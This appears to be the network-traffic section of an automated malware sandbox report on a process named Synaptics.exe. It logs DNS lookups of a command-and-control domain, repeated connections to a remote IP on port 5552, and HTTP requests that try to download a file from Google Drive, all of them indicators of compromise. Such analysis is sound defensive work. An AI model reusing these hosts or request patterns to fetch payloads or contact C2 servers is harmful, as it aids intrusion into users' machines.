                                                                                                                      Dec 30, 2024 11:41:08.027952909 CET44350093142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.147109985 CET44350081142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.147164106 CET44350081142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.147166967 CET50081443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:08.147190094 CET44350081142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.147229910 CET50081443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:08.147253036 CET44350081142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.147294998 CET50081443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:08.147300959 CET44350081142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.147330999 CET44350081142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.147337914 CET50081443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:08.147375107 CET50081443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:08.148005962 CET50081443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:08.148020983 CET44350081142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.148442984 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:08.148452044 CET44350097142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.148581982 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:08.148725986 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:08.148736000 CET44350097142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.556796074 CET44350089142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.556888103 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:08.569679022 CET555250073172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.569782972 CET500735552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:08.605151892 CET44350091142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.605218887 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:08.631787062 CET500735552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:08.636709929 CET555250073172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.638641119 CET44350093142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.638719082 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:08.746594906 CET44350097142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.746675014 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:15.465820074 CET501395552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:15.470596075 CET555250139172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:15.470662117 CET501395552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:15.471081972 CET501395552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:15.475914001 CET555250139172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.620659113 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:16.620683908 CET44350097142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.621211052 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:16.621217966 CET44350097142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.621406078 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.621434927 CET44350093142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.621639013 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.621644974 CET44350093142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.621766090 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:16.621783018 CET44350091142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.622318983 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:16.622334003 CET44350091142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.622539997 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.622551918 CET44350089142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.622733116 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.622739077 CET44350089142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.908061028 CET44350093142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.908163071 CET44350089142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.909147024 CET44350089142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.909163952 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.909179926 CET44350093142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.909399033 CET44350093142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.909434080 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.909745932 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.910851955 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.910852909 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.955652952 CET44350097142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.955708981 CET44350097142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.955821037 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:16.955821037 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:16.955822945 CET44350097142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.955910921 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:17.108305931 CET44350091142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:17.108356953 CET44350091142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:17.108457088 CET44350091142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:17.108470917 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:17.108541965 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:17.662502050 CET555250139172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:17.662619114 CET501395552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:17.730338097 CET501395552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:17.735375881 CET555250139172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:23.863301039 CET4975180192.168.2.669.42.215.252
                                                                                                                      Dec 30, 2024 11:41:23.864654064 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:23.865103960 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:23.866132021 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:23.866247892 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:24.553148985 CET501465552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:24.558059931 CET555250146172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:24.558784008 CET501465552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:24.558784008 CET501465552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:24.563669920 CET555250146172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:28.919212103 CET555250146172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:28.919562101 CET501465552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:28.950968027 CET501465552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:28.955732107 CET555250146172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:33.600260019 CET501475552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:33.605058908 CET555250147172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:33.605797052 CET501475552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:33.611748934 CET501475552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:33.616492987 CET555250147172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:35.741250038 CET555250147172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:35.741318941 CET501475552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:35.777357101 CET501475552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:35.783067942 CET555250147172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:42.693772078 CET501505552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:42.698546886 CET555250150172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:42.698771954 CET501505552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:42.699043036 CET501505552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:42.703829050 CET555250150172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:44.827229977 CET555250150172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:44.830971003 CET501505552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:45.066664934 CET501505552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:45.071526051 CET555250150172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:51.756201029 CET501535552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:51.761039019 CET555250153172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:51.761161089 CET501535552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:51.761478901 CET501535552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:51.766500950 CET555250153172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:53.892740011 CET555250153172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:53.892951965 CET501535552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:53.949291945 CET501535552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:53.954077005 CET555250153172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:42:00.806713104 CET501545552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:42:00.811484098 CET555250154172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:42:00.811726093 CET501545552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:42:00.812107086 CET501545552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:42:00.816943884 CET555250154172.111.138.100192.168.2.6

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 30, 2024 11:40:36.279855013 CET5428353192.168.2.61.1.1.1
                                                                                                                      Dec 30, 2024 11:40:36.286524057 CET53542831.1.1.1192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:37.143122911 CET5311953192.168.2.61.1.1.1
                                                                                                                      Dec 30, 2024 11:40:37.150885105 CET53531191.1.1.1192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:37.162625074 CET6231953192.168.2.61.1.1.1
                                                                                                                      Dec 30, 2024 11:40:37.169770002 CET53623191.1.1.1192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:38.138865948 CET5286653192.168.2.61.1.1.1
                                                                                                                      Dec 30, 2024 11:40:38.146079063 CET53528661.1.1.1192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:43.481662989 CET6387253192.168.2.61.1.1.1
                                                                                                                      Dec 30, 2024 11:40:43.608350992 CET53638721.1.1.1192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:50.571055889 CET5412653192.168.2.61.1.1.1
                                                                                                                      Dec 30, 2024 11:40:50.578278065 CET53541261.1.1.1192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:57.413691044 CET5732953192.168.2.61.1.1.1
                                                                                                                      Dec 30, 2024 11:40:57.421999931 CET53573291.1.1.1192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:01.945580006 CET6156153192.168.2.61.1.1.1
                                                                                                                      Dec 30, 2024 11:41:01.952713013 CET53615611.1.1.1192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.626436949 CET6006453192.168.2.61.1.1.1
                                                                                                                      Dec 30, 2024 11:41:16.633574963 CET53600641.1.1.1192.168.2.6

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 30, 2024 11:40:36.279855013 CET192.168.2.61.1.1.10x55beStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:40:37.143122911 CET192.168.2.61.1.1.10xd3e6Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:40:37.162625074 CET192.168.2.61.1.1.10xdbf1Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:40:38.138865948 CET192.168.2.61.1.1.10x8717Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:40:43.481662989 CET192.168.2.61.1.1.10x4013Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:40:50.571055889 CET192.168.2.61.1.1.10xa45fStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:40:57.413691044 CET192.168.2.61.1.1.10xc7cStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:41:01.945580006 CET192.168.2.61.1.1.10xba16Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:41:16.626436949 CET192.168.2.61.1.1.10xcd76Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 30, 2024 11:40:36.286524057 CET1.1.1.1192.168.2.60x55beNo error (0)docs.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:40:37.150885105 CET1.1.1.1192.168.2.60xd3e6Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:40:37.169770002 CET1.1.1.1192.168.2.60xdbf1No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:40:38.146079063 CET1.1.1.1192.168.2.60x8717No error (0)drive.usercontent.google.com142.250.185.65A (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:40:43.608350992 CET1.1.1.1192.168.2.60x4013Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:40:50.578278065 CET1.1.1.1192.168.2.60xa45fName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:40:57.421999931 CET1.1.1.1192.168.2.60xc7cName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:41:01.952713013 CET1.1.1.1192.168.2.60xba16Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:41:16.633574963 CET1.1.1.1192.168.2.60xcd76Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • docs.google.com
                                                                                                                      • drive.usercontent.google.com
                                                                                                                      • freedns.afraid.org

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.64975169.42.215.252804508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 30, 2024 11:40:37.176495075 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                      User-Agent: MyApp
                                                                                                                      Host: freedns.afraid.org
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Dec 30, 2024 11:40:37.786283016 CET243INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:37 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: keep-alive
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      X-Cache: MISS
                                                                                                                      Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.649742142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:37 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:37 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-7JmoGStwlU-jRuILUD12gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.649741142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:37 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:37 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-wkYxvGQahR5Uh3sUbg_hag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.649759142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:38 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-LOhPrLPKklLXzkuD42DNUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.649761142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:38 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-30 10:40:39 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5NjZUDpzwGZ-E764jvD7gqnznCYxkn8gCFgiob_B6Ou7P6LRXS_uat4TkQVgLcIIei
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:39 GMT
                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-d6BqksB8bJk21Leg9h3EQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Set-Cookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk; expires=Tue, 01-Jul-2025 10:40:38 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:39 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 68 32 4e 53 5a 64 67 6a 70 58 2d 6e 53 35 77 67 64 4c 4d 2d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zh2NSZdgjpX-nS5wgdLM-w">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                      2024-12-30 10:40:39 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
